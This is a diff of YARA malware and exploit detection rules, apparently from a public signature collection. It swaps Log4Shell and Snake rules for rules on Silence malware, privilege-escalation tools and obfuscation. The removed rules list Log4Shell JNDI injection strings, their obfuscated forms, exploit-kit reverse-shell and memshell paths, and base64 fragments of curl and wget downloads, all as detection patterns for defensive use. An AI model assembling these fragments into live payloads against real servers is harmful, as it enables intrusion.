+		logic_hash = "b88795268c080fe19f7e185d1542b520616fe6c00bae23a99981aa1ee8abacb3"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f24b160e9e9d02b8e31524b8a0b30e7cdc66dd085e24e4c58240e4c4b6ec0ac2"
 
 	strings:
-		$a = { 25 73 23 31 }
-		$b = { 25 73 23 32 }
-		$c = { 25 73 23 33 }
-		$d = { 25 73 23 34 }
-		$e = { 2e 74 6d 70 }
-		$g = { 2e 73 61 76 }
-		$h = { 2e 75 70 64 }
+		$x1 = "adobeudp.exe" fullword wide
+		$x2 = "%s\\adobeudp.exeZone.Identifier" fullword ascii
+		$x3 = "%s\\igfxpers_%08x.exe" fullword ascii
+		$x4 = "%s\\adobeudp.exe" fullword ascii
+		$s1 = "SoftWare\\MicroSoft\\Windows\\CurrentVersion\\Run" fullword ascii
+		$s2 = "Copyright (C)  1999 - 2017" fullword wide
+		$s3 = "%sget.php?name=%x" fullword ascii
+		$s4 = "VNASSRUNXYC" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e03edb9bd7cbe200dc59f361db847f8a" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_RU_Snake_Indicators_May23_1
+
+rule SIGNATURE_BASE_Silence_Malware_2 : FILE
 {
 	meta:
-		description = "Detects indicators found in Snake malware samples"
-		author = "Florian Roth"
-		id = "0d4fa8a7-447c-5905-bab9-b63de6209036"
-		date = "2023-05-10"
-		modified = "2025-03-21"
-		reference = "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mal_ru_snake_may23.yar#L45-L80"
+		description = "Detects malware sample mentioned in the Silence report on Securelist"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4c7d753-fd04-5e11-9960-1ad238039c11"
+		date = "2017-11-01"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/the-silence/83009/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_silence.yar#L40-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb7a4ad2ee0868f17b6235f070e4c03e2394e3c252253f334b29ad26116b09e5"
-		score = 85
-		quality = 35
-		tags = ""
-		hash1 = "10b854d66240d9ee1ce4296d2f7857d2b1c6f062ca836d13d777930d678b3ca6"
-		hash2 = "15ac5a61fb3e751045de2d7f5ff26c673f3883e326cd1b3a63889984a4fb2a8f"
-		hash3 = "315ec991709eb45eccf724dfe31bccb7affcac7f8e8007e688ba8d02827205e0"
-		hash4 = "417eb4fb9ada270af35562ff317807ac5ca9ee26181fe89990858f0944d3a6a7"
-		hash5 = "48112970de6ea0f925f0657b30adcd0723df94afc98cfafdc991d70ad3602119"
-		hash6 = "55ea557bcf4c143f20c616abe9075f7faafbf825aeef9ddb4f2b201acc44414b"
-		hash7 = "6568bbeeb417e1111bf284e73152d90fe17e5497da7630ccddcbc666730dccef"
-		hash8 = "81d620cb645006ffc9ac1b9d98a53aa286ae92b025bda075962079633f020482"
-		hash9 = "888a3029b1b8b664eb1fc77dd511c4088a1e28ae5535a8683642bb3dca011d00"
-		hash10 = "9027b4fef50b36289d630059425dc1137c88328329c3ea9dbc348dccd001adc0"
-		hash11 = "9ac199572cab67433726976a0e9ba39d6feed1d567d6d230ebe3133df8dcb7fa"
-		hash12 = "a64e5d872421991226ee040b4cd49a89ca681bdef4c10c4798b6c7b5c832c6df"
-		hash13 = "b5d2da5eb57b5ab26edb927469552629f3cf43bbce2b1a128f6daac7cf57f6f7"
-		hash14 = "bc15de1d1c6c62c0bf856e0368adabc4941e7b687a969912494c173233e6d28d"
-		hash15 = "bdf94311313c39a3413464f623bd75a3db2eb05cc01090acd6dcd462a605eb4a"
-		hash16 = "e4311892ae00bf8148a94fa900fc8e2c279a2acd3b4b4b4c3d0c99dd1d32353c"
-		hash17 = "ed74288b367a93c6b47343bc696e751b9c465761ce9c4208901726baa758b234"
-		hash18 = "ef1f1c7692b92a730f76b6227643b2d02a6e353af6e930166e3b48e3903e4ffd"
-		hash19 = "f5e982b76af7f447742753f0b57eec3d7dd2e3c8e5506c35d4cf6c860b829f45"
+		logic_hash = "8cb6320eac984b7a332c1c84582a7ca7e90d409e518106c4e7655948f6863889"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27"
 
 	strings:
-		$s1 = "\\\\.\\%s\\\\" ascii fullword
-		$s2 = "read_peer_nfo" ascii fullword
-		$s3 = "rcv_buf=%d%c" ascii fullword
-		$s4 = "%s: (0x%08x)" ascii fullword
-		$s5 = "no_impersonate" ascii fullword
+		$x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii
+		$x2 = "\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}" fullword ascii
+		$s1 = "My Sample Service: ServiceMain: SetServiceStatus returned error" fullword ascii
+		$s2 = "\\mss.exe" ascii
+		$s3 = "\\out.dat" ascii
+		$s4 = "\\mss.txt" ascii
+		$s5 = "Default monitor" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "69f3ec173efb6fd3ab5f79e0f8051335" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_Callbackdomain_Iocs_Dec21_1 : CVE_2021_44228
+rule SIGNATURE_BASE_Win_Privesc_Gp3Finder_V4_0 : FILE
 {
 	meta:
-		description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228"
+		description = "Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "474afa96-1758-587e-8cab-41c5205e245e"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L2-L14"
+		id = "3b310c12-ac69-527b-9503-1486ae5f692c"
+		date = "2016-06-02"
+		modified = "2023-12-05"
+		reference = "http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d5e60f91b715242c6f8ee806ab81d3e296ce1467cf2d065b053f33e3ae00f14"
-		score = 60
+		logic_hash = "7d5618315ae5293ce1aea18d255d08bb007f39a466021fb636605684433da158"
+		score = 80
 		quality = 60
-		tags = "CVE-2021-44228"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d34e214ef2ca33516875fb91a72d5798f89b9ea8964d3990f99863c79530c06"
 
 	strings:
-		$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
+		$x1 = "Check for and attempt to decrypt passwords on share" ascii
+		$x2 = "Failed to auto get and decrypt passwords. {0}s/" fullword ascii
+		$x3 = "GPPPFinder - Group Policy Preference Password Finder" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_EXPL_JNDI_Exploit_Patterns_Dec21_1
+rule SIGNATURE_BASE_Win_Privesc_Folderperm
 {
 	meta:
-		description = "Detects JNDI Exploit Kit patterns in files"
+		description = "Detects a tool that can be used for privilege escalation - file folderperm.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a9127dd2-b818-5ca8-877a-3c47b1e92606"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://github.com/pimps/JNDI-Exploit-Kit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L16-L49"
+		id = "131fdb57-f9ca-5247-8bb4-c939eff5b8bf"
+		date = "2016-06-02"
+		modified = "2023-12-05"
+		reference = "http://www.greyhathacker.net/?p=738"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L28-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9442c8c4eee76539892752361657c86e80acc7990876e787317b042a4637f669"
-		score = 60
+		logic_hash = "899fda75e4c6d9f588767e5170dbd30241a492ba89f7cc1b0ad4adb2fcd173cb"
+		score = 80
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1aa87df34826b1081c40bb4b702750587b32d717ea6df3c29715eb7fc04db755"
 
 	strings:
-		$x01 = "/Basic/Command/Base64/"
-		$x02 = "/Basic/ReverseShell/"
-		$x03 = "/Basic/TomcatMemshell"
-		$x04 = "/Basic/JettyMemshell"
-		$x05 = "/Basic/WeblogicMemshell"
-		$x06 = "/Basic/JBossMemshell"
-		$x07 = "/Basic/WebsphereMemshell"
-		$x08 = "/Basic/SpringMemshell"
-		$x09 = "/Deserialization/URLDNS/"
-		$x10 = "/Deserialization/CommonsCollections1/Dnslog/"
-		$x11 = "/Deserialization/CommonsCollections2/Command/Base64/"
-		$x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/"
-		$x13 = "/Deserialization/Jre8u20/TomcatMemshell"
-		$x14 = "/TomcatBypass/Dnslog/"
-		$x15 = "/TomcatBypass/Command/"
-		$x16 = "/TomcatBypass/ReverseShell/"
-		$x17 = "/TomcatBypass/TomcatMemshell"
-		$x18 = "/TomcatBypass/SpringMemshell"
-		$x19 = "/GroovyBypass/Command/"
-		$x20 = "/WebsphereBypass/Upload/"
-		$fp1 = "<html"
+		$x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii
+		$x2 = "Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy" fullword ascii
+		$x3 = "Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] " fullword ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_JAVA_Exception_Dec21_1 : CVE_2021_44228
+rule SIGNATURE_BASE_Win_Privesc_Adaclscan4_3
 {
 	meta:
-		description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
+		description = "Detects a tool that can be used for privilege escalation - file ADACLScan4.3.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82cf337e-4ea1-559b-a7b8-512a07adf06f"
-		date = "2021-12-12"
-		modified = "2025-03-29"
-		reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L51-L66"
+		id = "15867a9c-9b9b-5d29-bf51-2b3e91af556f"
+		date = "2016-06-02"
+		modified = "2023-12-05"
+		reference = "https://adaclscan.codeplex.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_win_privesc.yar#L46-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "98eabec4ad2f5c4d22db9c3bebdc82c8dc6723599748360875fc7b613b1019ab"
+		logic_hash = "ca657e5c4172d240f46a890fc112ee89d5bdf9e35e7d412332ee11bdaf166215"
 		score = 60
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3473ddb452de7640fab03cad3e8aaf6a527bdd6a7a311909cfef9de0b4b78333"
 
 	strings:
-		$xa1 = "header with value of BadAttributeValueException: "
-		$sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
-		$sa2 = "Error looking up JNDI resource"
+		$s1 = "<Label x:Name=\"lblPort\" Content=\"Port:\"  HorizontalAlignment=\"Left\" Height=\"28\" Margin=\"10,0,0,0\" Width=\"35\"/>" fullword ascii
+		$s2 = "(([System.IconExtractor]::Extract(\"mmcndmgr.dll\", 126, $true)).ToBitMap()).Save($env:temp + \"\\Other.png\")    " fullword ascii
+		$s3 = "$bolValid = $ctx.ValidateCredentials($psCred.UserName,$psCred.GetNetworkCredential().Password)" fullword ascii
 
 	condition:
-		$xa1 or all of ( $sa* )
+		all of them
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Soft : FILE CVE_2021_44228
+rule SIGNATURE_BASE_Persistence_Agent_Macos : FILE
 {
 	meta:
-		description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
-		author = "Florian Roth (Nextron Systems)"
-		id = "87e536a5-cc11-528a-b100-4fa3b2b7bc0c"
-		date = "2021-12-10"
-		modified = "2025-03-24"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L68-L92"
+		description = "Detects a Python agent that establishes persistence on macOS"
+		author = "John Lambert @JohnLaTwC"
+		id = "9c69af3c-ee85-58ac-8b78-66760addc117"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://ghostbin.com/paste/mz5nf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_osx_pyagent_persistence.yar#L1-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61a005060e2041afa5a9aa0b2a5e26cfc9a53cbafa78b15e4dd2c3b38127373a"
-		score = 50
-		quality = 85
-		tags = "FILE, CVE-2021-44228"
+		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
+		logic_hash = "2613fcb32cbdbb24df6c48fcb5d16549783e50246d2cdb8c473375644dd88254"
+		score = 75
+		quality = 58
+		tags = "FILE"
 
 	strings:
-		$x01 = "${jndi:ldap:/"
-		$x02 = "${jndi:rmi:/"
-		$x03 = "${jndi:ldaps:/"
-		$x04 = "${jndi:dns:/"
-		$x05 = "${jndi:iiop:/"
-		$x06 = "${jndi:http:/"
-		$x07 = "${jndi:nis:/"
-		$x08 = "${jndi:nds:/"
-		$x09 = "${jndi:corba:/"
-		$fp1 = "<html"
-		$fp2 = "/nessus}"
+		$h1 = "#!/usr/bin/env python"
+		$s_1 = "<plist" ascii fullword
+		$s_2 = "ProgramArguments" ascii fullword
+		$s_3 = "Library" ascii fullword
+		$sinterval_1 = "StartInterval" ascii fullword
+		$sinterval_2 = "RunAtLoad" ascii fullword
+		$e_1 = /(AHAAbABpAHMAdA|cGxpc3|PABwAGwAaQBzAHQA|PHBsaXN0|wAcABsAGkAcwB0A|xwbGlzd)/ ascii
+		$e_2 = /(AAcgBvAGcAcgBhAG0AQQByAGcAdQBtAGUAbgB0AHMA|AHIAbwBnAHIAYQBtAEEAcgBnAHUAbQBlAG4AdABzA|Byb2dyYW1Bcmd1bWVudH|cm9ncmFtQXJndW1lbnRz|UAByAG8AZwByAGEAbQBBAHIAZwB1AG0AZQBuAHQAcw|UHJvZ3JhbUFyZ3VtZW50c)/ ascii
+		$e_4 = /(AGkAYgByAGEAcgB5A|aWJyYXJ5|TABpAGIAcgBhAHIAeQ|TGlicmFye|wAaQBiAHIAYQByAHkA|xpYnJhcn)/ ascii
+		$einterval_a = /(AHQAYQByAHQASQBuAHQAZQByAHYAYQBsA|dGFydEludGVydmFs|MAdABhAHIAdABJAG4AdABlAHIAdgBhAGwA|N0YXJ0SW50ZXJ2YW|U3RhcnRJbnRlcnZhb|UwB0AGEAcgB0AEkAbgB0AGUAcgB2AGEAbA)/ ascii
+		$einterval_b = /(AHUAbgBBAHQATABvAGEAZA|dW5BdExvYW|IAdQBuAEEAdABMAG8AYQBkA|J1bkF0TG9hZ|UgB1AG4AQQB0AEwAbwBhAGQA|UnVuQXRMb2Fk)/ ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and ( ( all of ( $s_* ) and 1 of ( $sinterval* ) ) or ( all of ( $e_* ) and 1 of ( $einterval* ) ) )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_OBFUSC : CVE_2021_44228
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hex_Encoded_Code
 {
 	meta:
-		description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
+		description = "Detects hex encoded code that has been base64 encoded"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d7c4092a-6ffc-5a89-b73a-f7f0ac984cbd"
-		date = "2021-12-12"
-		modified = "2021-12-13"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L94-L116"
+		id = "2cfd278f-ff45-5e23-b552-dad688ab303b"
+		date = "2019-04-29"
+		modified = "2025-03-21"
+		reference = "https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00231db2ae83a89c187dbde1f2bc67fdaedcf1cbdf872afdcc374d2d0abee515"
-		score = 60
+		logic_hash = "f1451e2dd0e4e70a0f39f609331762cce369642e9fadbef83d932da2a0a6c60b"
+		score = 65
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = ""
 
-	strings:
-		$x1 = "$%7Bjndi:"
-		$x2 = "%2524%257Bjndi"
-		$x3 = "%2F%252524%25257Bjndi%3A"
-		$x4 = "${jndi:${lower:"
-		$x5 = "${::-j}${"
-		$x6 = "${${env:BARFOO:-j}"
-		$x7 = "${::-l}${::-d}${::-a}${::-p}"
-		$x8 = "${base64:JHtqbmRp"
-		$fp1 = "<html"
+	strings:
+		$x1 = { 78 34 4e ?? ?? 63 65 44 ?? ?? 58 48 67 }
+		$x2 = { 63 45 44 ?? ?? 58 48 67 ?? ?? ?? 78 34 4e }
+		$fp1 = "Microsoft Azure Code Signp$"
 
 	condition:
 		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EXPL_Log4J_CVE_2021_44228_Dec21_Hard : FILE CVE_2021_44228
+rule SIGNATURE_BASE_SUSP_Reversed_Base64_Encoded_EXE : FILE
 {
 	meta:
-		description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
-		author = "Florian Roth"
-		id = "5297c42d-7138-507d-a3eb-153afe522816"
-		date = "2021-12-10"
-		modified = "2025-03-20"
-		reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L118-L140"
+		description = "Detects an base64 encoded executable with reversed characters"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b52e59e-7c0a-560f-8123-1099c52e7e3d"
+		date = "2020-04-06"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L62-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a4fc285dd1680ebc8a1042eeb5fbba73b9e2df70678adf3163122d84405325e"
-		score = 65
+		logic_hash = "0a2f1caf2235ee24f531c9f9a5ebdc0c97a90890218669749a4c83bede80a336"
+		score = 80
 		quality = 85
-		tags = "FILE, CVE-2021-44228"
+		tags = "FILE"
+		hash1 = "7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8"
 
 	strings:
-		$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
-		$x2 = "Reference Class Name: foo"
-		$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fp1 = "/QUALYSTEST" ascii
-		$fp2 = "w.nessus.org/nessus"
-		$fp3 = "/nessus}"
+		$s1 = "AEAAAAEQATpVT"
+		$s2 = "AAAAAAAAAAoVT"
+		$s3 = "AEAAAAEAAAqVT"
+		$s4 = "AEAAAAIAAQpVT"
+		$s5 = "AEAAAAMAAQqVT"
+		$sh1 = "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU" ascii
+		$sh2 = "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR" ascii
+		$sh3 = "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV" ascii
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Base64_Encoded_Exploit_Indicators_Dec21 : CVE_2021_44228
+rule SIGNATURE_BASE_SUSP_Script_Base64_Blocks_Jun20_1
 {
 	meta:
-		description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
+		description = "Detects suspicious file with base64 encoded payload in blocks"
 		author = "Florian Roth (Nextron Systems)"
-		id = "09abc4f0-ace7-5f53-b1d3-5f5c6bf3bdba"
-		date = "2021-12-10"
-		modified = "2021-12-13"
-		reference = "https://twitter.com/Reelix/status/1469327487243071493"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L142-L165"
+		id = "cef759a5-b02a-53e7-bf27-184eee6bc3fa"
+		date = "2020-06-05"
+		modified = "2025-03-21"
+		reference = "https://posts.specterops.io/covenant-v0-5-eee0507b85ba"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L85-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "703a83916c7279bcdc3cd61602472c2a3815140235be169f5b2063a547438c61"
+		logic_hash = "7d456cbbbd76f543afe144a2876a02db834aa6b09ecd4d6aa2f25ce8eeac5de8"
 		score = 70
 		quality = 85
-		tags = "CVE-2021-44228"
+		tags = ""
 
 	strings:
-		$sa1 = "Y3VybCAtcy"
-		$sa2 = "N1cmwgLXMg"
-		$sa3 = "jdXJsIC1zI"
-		$sb1 = "fHdnZXQgLXEgLU8tI"
-		$sb2 = "x3Z2V0IC1xIC1PLS"
-		$sb3 = "8d2dldCAtcSAtTy0g"
-		$fp1 = "<html"
+		$sa1 = "<script language=" ascii
+		$sb2 = { 41 41 41 22 2B 0D 0A 22 41 41 41 }
 
 	condition:
-		1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_Jdniexploit_Indicators_Dec21 : FILE
+rule SIGNATURE_BASE_SUSP_Reversed_Hacktool_Author : FILE
 {
 	meta:
-		description = "Detects indicators of JDNI usage in log files and other payloads"
+		description = "Detects a suspicious path traversal into a Windows folder"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2df8b8f3-8d8d-5982-8c85-692b7d91ebb2"
-		date = "2021-12-10"
-		modified = "2021-12-12"
-		reference = "https://github.com/flypig5211/JNDIExploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L167-L180"
+		id = "33e20d75-af07-5df2-82c3-c48aec37a947"
+		date = "2020-06-10"
+		modified = "2025-03-21"
+		reference = "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L100-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7886a67672001f0db72575d96d3a12341bfcdc49a9951e3d5e2a88ab46bf5a5d"
-		score = 70
-		quality = 60
+		logic_hash = "3681fb11dabf9905915d23f4198145b503a260d628415fd79ad71d7703ba9f6f"
+		score = 65
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
+		$x1 = "iwiklitneg" fullword ascii wide
+		$x2 = " eetbus@ " ascii wide
 
 	condition:
-		filesize < 100MB and $xr1
+		filesize < 4000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_OBFUSC_Dec21_1 : CVE_2021_44228 FILE
+rule SIGNATURE_BASE_SUSP_Base64_Encoded_Hacktool_Dev : FILE
 {
 	meta:
-		description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
+		description = "Detects a suspicious base64 encoded keyword"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b8f56711-7922-54b9-9ce2-6ba05d64c80d"
-		date = "2021-12-11"
-		modified = "2022-11-08"
-		reference = "https://twitter.com/testanull/status/1469549425521348609"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_log4j_cve_2021_44228.yar#L182-L211"
+		id = "6dc7db4b-a614-51e4-a9a5-f869154dbbb1"
+		date = "2020-06-10"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/cyb3rops/status/1270626274826911744"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_obfuscation.yar#L116-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d6ffb70da82fe16e7a76feb31c01aa3e0cfc5625cc0e2b237ec851c646550839"
-		score = 60
+		logic_hash = "7345a528a12f87e5cbcabccf649566a038dd2115e8aec4f39599e357c8c6d57f"
+		score = 65
 		quality = 85
-		tags = "CVE-2021-44228, FILE"
+		tags = "FILE"
 
 	strings:
-		$f1 = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
-		$f2 = { 24 7B 75 70 70 65 72 3A ?? 7D }
-		$x3 = "$%7blower:"
-		$x4 = "$%7bupper:"
-		$x5 = "%24%7bjndi:"
-		$x6 = "$%7Blower:"
-		$x7 = "$%7Bupper:"
-		$x8 = "%24%7Bjndi:"
-		$fp1 = "<html"
+		$ = "QGdlbnRpbGtpd2" ascii wide
+		$ = "BnZW50aWxraXdp" ascii wide
+		$ = "AZ2VudGlsa2l3a" ascii wide
+		$ = "QGhhcm1qMH" ascii wide
+		$ = "BoYXJtajB5" ascii wide
+		$ = "AaGFybWowe" ascii wide
+		$ = "IEBzdWJ0ZW" ascii wide
+		$ = "BAc3VidGVl" ascii wide
+		$ = "gQHN1YnRlZ" ascii wide
 
 	condition:
-		(1 of ( $x* ) or filesize < 200KB and 1 of ( $f* ) ) and not 1 of ( $fp* )
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_Jdniexploit_Error_Indicators_Dec21_1
+rule SIGNATURE_BASE_Gen_Python_Reverse_Shell : FILE
 {
 	meta:
